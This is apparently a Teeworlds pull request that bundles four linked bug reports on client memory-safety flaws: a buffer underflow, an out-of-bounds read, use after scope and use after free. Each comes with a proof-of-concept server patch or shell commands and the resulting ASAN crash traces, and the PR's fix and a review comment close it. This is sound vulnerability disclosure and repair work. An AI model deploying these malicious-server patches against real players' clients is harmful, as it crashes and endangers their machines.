### PR TITLE
Fix some of the issues reported by mmmds

### LINKED ISSUE #2642: Write before a buffer
Revision: 92d91f8ff48d6759add6d639b13f6f98f13553c7

In `snapshot.cpp`, line 609, data is assigned to `aItemSizes` indexed `NumItems-1`. If `NumItems` is equal zero, data is written before the buffer (index is `-1`). 

```
File: src/engine/shared/snapshot.cpp
587: int CSnapshotBuilder::Finish(void *pSnapdata)
588: {
[...]
594:  pSnap->m_NumItems = m_NumItems;
595: 
596:  const int NumItems = m_NumItems;
[...] 
605:  for(int i = 0; i < NumItems-1; i++)
606:  {
607:    aItemSizes[i] = m_aOffsets[i+1] - m_aOffsets[i];
608:  }
609:  aItemSizes[NumItems-1] = m_DataSize - m_aOffsets[NumItems-1];
```

It affects the client and happens when the server sends a Snapshot without items. `CSnapshotBuilder`'s default value for `m_NumItems` is zero. If in `UnpackDelta` no items are added to the builder, the zero remains and causes the client to write to `aItemSizes[-1]`.

```
File: src/engine/shared/snapshot.cpp
512: void CSnapshotBuilder::Init()
513: {
514:  m_DataSize = 0;
515:  m_NumItems = 0;
516: }
```

```
File: src/engine/shared/snapshot.cpp

299: int CSnapshotDelta::UnpackDelta(const CSnapshot *pFrom, CSnapshot *pTo, const void *pSrcData, int DataSize)
300: {
301:  CSnapshotBuilder Builder;
[...]
312: 
313:  Builder.Init();
314: 
320: 
321:  // copy all non deleted stuff
322:  for(int i = 0; i < pFrom->NumItems(); i++)
323:  {
[...]
340:      mem_copy(
341:        Builder.NewItem(pFromItem->Type(), pFromItem->ID(), ItemSize),
342:        pFromItem->Data(), ItemSize);
343:    }
344:  }
345: 
346:  // unpack updated stuff
347:  for(int i = 0; i < pDelta->m_NumUpdateItems; i++)
348:  {
[...]
372:    if(!pNewData)
373:      pNewData = (int *)Builder.NewItem(Key>>16, Key&0xffff, ItemSize);
[...]
392:  }
393: 
394:  // finish up
395:  return Builder.Finish(pTo);
396: }
```

## PoC
It is possible to modify the server's code to trigger the vulnerability.

```
diff --git a/src/engine/shared/snapshot.cpp b/src/engine/shared/snapshot.cpp
index 578a56e0..1fde82c1 100644
--- a/src/engine/shared/snapshot.cpp
+++ b/src/engine/shared/snapshot.cpp
@@ -285,7 +285,7 @@ int CSnapshotDelta::CreateDelta(const CSnapshot *pFrom, CSnapshot *pTo, void *pD
 
        if(!pDelta->m_NumDeletedItems && !pDelta->m_NumUpdateItems && !pDelta->m_NumTempItems)
                return 0;
-
+       pDelta->m_NumUpdateItems = 0;
        return (int)((char*)pData-(char*)pDstData);
 }
```

When the client (compiled with ASAN) connects to the server, the client's crash happens.
```
cmake .. -DUSE_SYSTEM_EVENT2=ON -DCMAKE_CXX_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_C_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
```

```
==5284==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7fff4992902c at pc 0x5608e4e4156e bp 0x7fff49928fd0 sp 0x7fff49928fc0
WRITE of size 4 at 0x7fff4992902c thread T0
    #0 0x5608e4e4156d in CSnapshotBuilder::Finish(void*) /home/mmm/projects/teeworlds/src/engine/shared/snapshot.cpp:609
    #1 0x5608e4e42451 in CSnapshotDelta::UnpackDelta(CSnapshot const*, CSnapshot*, void const*, int) /home/mmm/projects/teeworlds/src/engine/shared/snapshot.cpp:395
    #2 0x5608e4ad95f2 in CClient::ProcessServerPacket(CNetChunk*) /home/mmm/projects/teeworlds/src/engine/client/client.cpp:1449
    #3 0x5608e4adc3eb in CClient::PumpNetwork() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:1581
    #4 0x5608e4adcc2f in CClient::Update() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:1751
    #5 0x5608e4adf5c9 in CClient::Run() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:2090
    #6 0x5608e4ab24a4 in main /home/mmm/projects/teeworlds/src/engine/client/client.cpp:2706
    #7 0x7f6401b8eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #8 0x5608e4abcef9 in _start (/home/mmm/projects/teeworlds/build-asan/teeworlds+0xa2ef9)

Address 0x7fff4992902c is located in stack of thread T0 at offset 28 in frame
    #0 0x5608e4e40ddf in CSnapshotBuilder::Finish(void*) /home/mmm/projects/teeworlds/src/engine/shared/snapshot.cpp:588

  This frame has 1 object(s):
    [32, 4128) 'aItemSizes' <== Memory access at offset 28 underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-underflow /home/mmm/projects/teeworlds/src/engine/shared/snapshot.cpp:609 in CSnapshotBuilder::Finish(void*)
Shadow bytes around the buggy address:
  0x10006931d1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006931d1c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006931d1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006931d1e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006931d1f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10006931d200: 00 00 f1 f1 f1[f1]00 00 00 00 00 00 00 00 00 00
  0x10006931d210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006931d220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006931d230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006931d240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006931d250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==5284==ABORTING
```

### LINKED ISSUE #2643: Read before a buffer
Revision: 92d91f8ff48d6759add6d639b13f6f98f13553c7

In `snapshot.cpp`, line 317, server controlled integer `pDelta->m_NumDeletedItems` is added to `pData` pointer. There's a check (line 318) verifying that `m_NumDeletedItems` doesn't cause reaching outside the buffer. However, as `m_NumDeletedItems` is a signed integer, the server can send negative value and cause `pData` to point before the buffer. In line 352, the client dereferences the pointer. 

```
File: src/engine/shared/snapshot.cpp
299: int CSnapshotDelta::UnpackDelta(const CSnapshot *pFrom, CSnapshot *pTo, const void *pSrcData, int DataSize)
300: {
301:  CSnapshotBuilder Builder;
302:  const CData *pDelta = (const CData *)pSrcData;
303:  const int *pData = (const int *)pDelta->m_pData;
304:  const int *pEnd = (const int *)(((const char *)pSrcData + DataSize));
305: 
[...]
315:  // unpack deleted stuff
316:  pDeleted = pData;
317:  pData += pDelta->m_NumDeletedItems;
318:  if(pData > pEnd)
319:    return -1;
320: 
[...]
346:  // unpack updated stuff
347:  for(int i = 0; i < pDelta->m_NumUpdateItems; i++)
348:  {
349:    if(pData+2 > pEnd)
350:      return -1;
351: 
352:    Type = *pData++;
[...]
```

## PoC
It is possible to modify server's code to trigger the vulnerability.

```
diff --git a/src/engine/shared/snapshot.cpp b/src/engine/shared/snapshot.cpp
index 578a56e0..38cd463e 100644
--- a/src/engine/shared/snapshot.cpp
+++ b/src/engine/shared/snapshot.cpp
@@ -285,7 +285,7 @@ int CSnapshotDelta::CreateDelta(const CSnapshot *pFrom, CSnapshot *pTo, void *pD
 
        if(!pDelta->m_NumDeletedItems && !pDelta->m_NumUpdateItems && !pDelta->m_NumTempItems)
                return 0;
-
+       pDelta->m_NumDeletedItems = -2147483648;
        return (int)((char*)pData-(char*)pDstData);
 }
```

When the client (compiled with ASAN) connects to the server the client's crash happens.

```
cmake .. -DUSE_SYSTEM_EVENT2=ON -DCMAKE_CXX_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_C_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
```

```
==5664==ERROR: AddressSanitizer: SEGV on unknown address 0x7ffb47c1f5ac (pc 0x55f23de5aaf2 bp 0x7ffb47c1f5ac sp 0x7ffd47c0b900 T0)
==5664==The signal is caused by a READ memory access.
    #0 0x55f23de5aaf1 in CSnapshotDelta::UnpackDelta(CSnapshot const*, CSnapshot*, void const*, int) /home/mmm/projects/teeworlds/src/engine/shared/snapshot.cpp:352
    #1 0x55f23daf25f2 in CClient::ProcessServerPacket(CNetChunk*) /home/mmm/projects/teeworlds/src/engine/client/client.cpp:1449
    #2 0x55f23daf53eb in CClient::PumpNetwork() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:1581
    #3 0x55f23daf5c2f in CClient::Update() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:1751
    #4 0x55f23daf85c9 in CClient::Run() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:2090
    #5 0x55f23dacb4a4 in main /home/mmm/projects/teeworlds/src/engine/client/client.cpp:2706
    #6 0x7f733e188b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #7 0x55f23dad5ef9 in _start (/home/mmm/projects/teeworlds/build-asan/teeworlds+0xa2ef9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/mmm/projects/teeworlds/src/engine/shared/snapshot.cpp:352 in CSnapshotDelta::UnpackDelta(CSnapshot const*, CSnapshot*, void const*, int)
==5664==ABORTING
```

### LINKED ISSUE #2644: Char buffer used after scope
Revision: 92d91f8ff48d6759add6d639b13f6f98f13553c7

When the client downloads a map from the server, it displays information about it. This information is held in `char aBuf[128]` defined inside a block. Its address is assigned to `pTitle` and it's used later (outside the block).

```
File: src/game/client/components/menus.cpp
1554: int CMenus::Render()
1555: {
[...]
1709:     else if(m_Popup == POPUP_CONNECTING)
1710:     {
1711:       pTitle = Localize("Connecting to");
1712:       if(Client()->MapDownloadTotalsize() > 0)
1713:       {
1714:         char aBuf[128];
1715:         str_format(aBuf, sizeof(aBuf), "%s: %s", Localize("Downloading map"), Client()->MapDownloadName());
1716:         pTitle = aBuf;
1717:         pExtraText = "";
1718:         NumOptions = 5;
1719:       }
1720:     }
[...]
1777:     UI()->DoLabel(&Part, pTitle, Part.h*ms_FontmodHeight*0.8f, CUI::ALIGN_CENTER);
```

## PoC
Easy way to trigger the vulnerability is to remove all maps from the client and connect to any server. The client compiled with ASAN will crash.
```
$ rm -rf data/maps
$ rm -rf ~/.local/share/teeworlds/downloadedmaps/
```

```
cmake .. -DUSE_SYSTEM_EVENT2=ON -DCMAKE_CXX_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_C_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
```

```
==6128==ERROR: AddressSanitizer: stack-use-after-scope on address 0x7ffc8e015120 at pc 0x7f2af20cf66e bp 0x7ffc8e012e90 sp 0x7ffc8e012638
READ of size 21 at 0x7ffc8e015120 thread T0
    #0 0x7f2af20cf66d  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d)
    #1 0x56286ccaf098 in str_length /home/mmm/projects/teeworlds/src/base/system.c:1892
    #2 0x56286c98f7e4 in CTextRender::TextEx(CTextCursor*, char const*, int) /home/mmm/projects/teeworlds/src/engine/client/text.cpp:821
    #3 0x56286c985531 in CTextRender::TextWidth(void*, float, char const*, int, float) /home/mmm/projects/teeworlds/src/engine/client/text.cpp:521
    #4 0x56286cb76cd7 in CUI::DoLabel(CUIRect const*, char const*, float, CUI::EAlignment, float, bool) /home/mmm/projects/teeworlds/src/game/client/ui.cpp:374
    #5 0x56286ca422c2 in CMenus::Render() /home/mmm/projects/teeworlds/src/game/client/components/menus.cpp:1777
    #6 0x56286ca4a972 in CMenus::OnRender() /home/mmm/projects/teeworlds/src/game/client/components/menus.cpp:2352
    #7 0x56286cb431a4 in CGameClient::OnRender() /home/mmm/projects/teeworlds/src/game/client/gameclient.cpp:604
    #8 0x56286c93aa93 in CClient::Render() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:781
    #9 0x56286c93aa93 in CClient::Run() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:2113
    #10 0x56286c90d4a4 in main /home/mmm/projects/teeworlds/src/engine/client/client.cpp:2706
    #11 0x7f2aefdc8b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #12 0x56286c917ef9 in _start (/home/mmm/projects/teeworlds/build-asan/teeworlds+0xa2ef9)

Address 0x7ffc8e015120 is located in stack of thread T0 at offset 7168 in frame
    #0 0x56286ca415af in CMenus::Render() /home/mmm/projects/teeworlds/src/game/client/components/menus.cpp:1555

  This frame has 63 object(s):
    [32, 48) 'Screen'
    [96, 112) 'TabBar'
    [160, 176) 'MainView'
    [224, 240) 'Button'
    [288, 304) 'Row'
    [352, 368) 'Color'
    [416, 432) '<unknown>'
    [480, 496) '<unknown>'
    [544, 560) 'XText'
    [608, 624) 'Box'
    [672, 688) '<unknown>'
    [736, 752) 'Part'
    [800, 816) 'BottomBar'
    [864, 880) '<unknown>'
    [928, 944) 'Yes'
    [992, 1008) 'No'
    [1056, 1072) '<unknown>'
    [1120, 1136) '<unknown>'
    [1184, 1200) 'Label'
    [1248, 1264) 'EditBox'
    [1312, 1328) 'Save'
    [1376, 1392) 'TryAgain'
    [1440, 1456) 'Abort'
    [1504, 1520) '<unknown>'
    [1568, 1584) '<unknown>'
    [1632, 1648) '<unknown>'
    [1696, 1712) '<unknown>'
    [1760, 1776) '<unknown>'
    [1824, 1840) '<unknown>'
    [1888, 1904) 'Label'
    [1952, 1968) 'QuadItem'
    [2016, 2032) '<unknown>'
    [2080, 2096) 'EditBox'
    [2144, 2160) 'Yes'
    [2208, 2224) 'No'
    [2272, 2288) '<unknown>'
    [2336, 2352) '<unknown>'
    [2400, 2416) 'EditBox'
    [2464, 2480) 'Yes'
    [2528, 2544) 'No'
    [2592, 2608) '<unknown>'
    [2656, 2672) '<unknown>'
    [2720, 2736) 'EditBox'
    [2784, 2800) '<unknown>'
    [2848, 2864) '<unknown>'
    [2912, 2928) 'CancelButton'
    [2976, 2992) 'ConfirmButton'
    [3040, 3056) '<unknown>'
    [3104, 3120) '<unknown>'
    [3168, 3184) '<unknown>'
    [3232, 3248) '<unknown>'
    [3296, 3312) '<unknown>'
    [3360, 3376) '<unknown>'
    [3424, 3440) '<unknown>'
    [3488, 3504) 'MainView'
    [3552, 3568) '<unknown>'
    [3616, 3636) 'Item'
    [3680, 3872) 'FilterInfo'
    [3904, 7116) 'ServerInfo'
    [7168, 7296) 'aBuf' <== Memory access at offset 7168 is inside this variable
    [7328, 7456) 'aBuf'
    [7488, 8000) 'aBufOld'
    [8032, 8544) 'aBufNew'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-use-after-scope (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d) 
Shadow bytes around the buggy address:
  0x100011bfa9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100011bfa9e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100011bfa9f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100011bfaa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100011bfaa10: 00 00 00 00 00 00 00 00 00 00 00 00 00 04 f2 f2
=>0x100011bfaa20: f2 f2 f2 f2[f8]f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x100011bfaa30: f8 f8 f8 f8 f2 f2 f2 f2 00 00 00 00 00 00 00 00
  0x100011bfaa40: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00
  0x100011bfaa50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100011bfaa60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100011bfaa70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==6128==ABORTING
```

### LINKED ISSUE #2645: Client use-after-free triggered by ReadyToEnter message
Revision: 92d91f8ff48d6759add6d639b13f6f98f13553c7

In `gameclient.cpp`, line 1312, snapshot data is assigned to `m_Snap.m_pGameData`. Then, this value is access in line 504.
```
File: src/game/client/gameclient.cpp
1131: void CGameClient::OnNewSnapshot()
1132: {
1133:   // clear out the invalid pointers
1134:   mem_zero(&m_Snap, sizeof(m_Snap));
1135: 
1136:   // secure snapshot
1137:   {
1138:     int Num = Client()->SnapNumItems(IClient::SNAP_CURRENT);
1139:     for(int Index = 0; Index < Num; Index++)
1140:     {
1141:       IClient::CSnapItem Item;
1142:       const void *pData = Client()->SnapGetItem(IClient::SNAP_CURRENT, Index, &Item);
[...]
1310:       else if(Item.m_Type == NETOBJTYPE_GAMEDATA)
1311:       {
1312:         m_Snap.m_pGameData = (const CNetObj_GameData *)pData;
```

```
File: src/game/client/gameclient.cpp
498: void CGameClient::UpdatePositions()
499: {
500:  // local character position
501:  if(Config()->m_ClPredict && Client()->State() != IClient::STATE_DEMOPLAYBACK)
502:  {
503:    if(!m_Snap.m_pLocalCharacter ||
504:      (m_Snap.m_pGameData && m_Snap.m_pGameData->m_GameStateFlags&(GAMESTATEFLAG_PAUSED|GAMESTATEFLAG_ROUNDOVER|GAMESTATEFLAG_GAMEOVER)))
```

The server can send a message `NETMSGTYPE_SV_READYTOENTER` that removes all elements in the Snapshot Storage, thus frees memory that `m_Snap.m_pGameData` points to.

```
File: src/game/client/gameclient.cpp
617: void CGameClient::OnMessage(int MsgId, CUnpacker *pUnpacker)
618: {
619:  Client()->RecordGameMessage(true);
[...]
988:  else if(MsgId == NETMSGTYPE_SV_READYTOENTER)
989:  {
990:    Client()->EnterGame();
991:  }
```
```
File: src/engine/client/client.cpp
465: void CClient::OnEnterGame()
466: {
467:  // reset input
468:  int i;
469:  for(i = 0; i < 200; i++)
470:    m_aInputs[i].m_Tick = -1;
471:  m_CurrentInput = 0;
472: 
473:  // reset snapshots
474:  m_aSnapshots[SNAP_CURRENT] = 0;
475:  m_aSnapshots[SNAP_PREV] = 0;
476:  m_SnapshotStorage.PurgeAll();
```

## PoC
It's possible to modify the server's code to send `NETMSGTYPE_SV_READYTOENTER` packet.
```
diff --git a/src/game/server/gamecontext.cpp b/src/game/server/gamecontext.cpp
index b15a2649..03005097 100644
--- a/src/game/server/gamecontext.cpp
+++ b/src/game/server/gamecontext.cpp
@@ -225,8 +225,11 @@ void CGameContext::SendChat(int ChatterClientID, int Mode, int To, const char *p
        Msg.m_pMessage = pText;
        Msg.m_TargetID = -1;
 
-       if(Mode == CHAT_ALL)
+       if(Mode == CHAT_ALL) {
                Server()->SendPackMsg(&Msg, MSGFLAG_VITAL, -1);
+               CNetMsg_Sv_ReadyToEnter m;
+               Server()->SendPackMsg(&m, MSGFLAG_VITAL|MSGFLAG_FLUSH, -1);
+       }
        else if(Mode == CHAT_TEAM)
        {
                // pack one for the recording only

```

Sending any chat message will cause the server to additionally send the malicious packet crashing the client (compiled with ASAN).

```
cmake .. -DUSE_SYSTEM_EVENT2=ON -DCMAKE_CXX_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_C_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
```

```
==6990==ERROR: AddressSanitizer: heap-use-after-free on address 0x619000192c14 at pc 0x563a5ee4f9d4 bp 0x7ffced600530 sp 0x7ffced600520
READ of size 4 at 0x619000192c14 thread T0
    #0 0x563a5ee4f9d3 in CGameClient::UpdatePositions() /home/mmm/projects/teeworlds/src/game/client/gameclient.cpp:504
    #1 0x563a5ee51118 in CGameClient::OnRender() /home/mmm/projects/teeworlds/src/game/client/gameclient.cpp:598
    #2 0x563a5ec48a93 in CClient::Render() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:781
    #3 0x563a5ec48a93 in CClient::Run() /home/mmm/projects/teeworlds/src/engine/client/client.cpp:2113
    #4 0x563a5ec1b4a4 in main /home/mmm/projects/teeworlds/src/engine/client/client.cpp:2706
    #5 0x7f143d581b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #6 0x563a5ec25ef9 in _start (/home/mmm/projects/teeworlds/build-asan/teeworlds+0xa2ef9)

0x619000192c14 is located 916 bytes inside of 1032-byte region [0x619000192880,0x619000192c88)
freed by thread T0 here:
    #0 0x7f143f9157a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x563a5efa8fc4 in CSnapshotStorage::PurgeAll() /home/mmm/projects/teeworlds/src/engine/shared/snapshot.cpp:415

previously allocated by thread T0 here:
    #0 0x7f143f915b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x563a5efa91af in CSnapshotStorage::Add(int, long long, int, void*, int) /home/mmm/projects/teeworlds/src/engine/shared/snapshot.cpp:459

SUMMARY: AddressSanitizer: heap-use-after-free /home/mmm/projects/teeworlds/src/game/client/gameclient.cpp:504 in CGameClient::UpdatePositions()
Shadow bytes around the buggy address:
  0x0c328002a530: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c328002a540: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c328002a550: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c328002a560: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c328002a570: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c328002a580: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c328002a590: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c328002a5a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c328002a5b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c328002a5c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c328002a5d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==6990==ABORTING
```

### PR DESCRIPTION
**Pull request by heinrich5991**
Fix #2642.
Fix #2643.
Fix #2644.
Fix #2645.

### CODE REVIEW

File: src/game/client/components/menus.cpp [hunk 1]
```diff
@@ -1697,6 +1697,7 @@ int CMenus::Render()
 	else
 	{
 		// render full screen popup
+		char aTitleBuf[128];
```
Comment (Robyt3) [inline src/game/client/components/menus.cpp:1700]: Could also reuse this buffer later on in the method, after the title has been rendered.
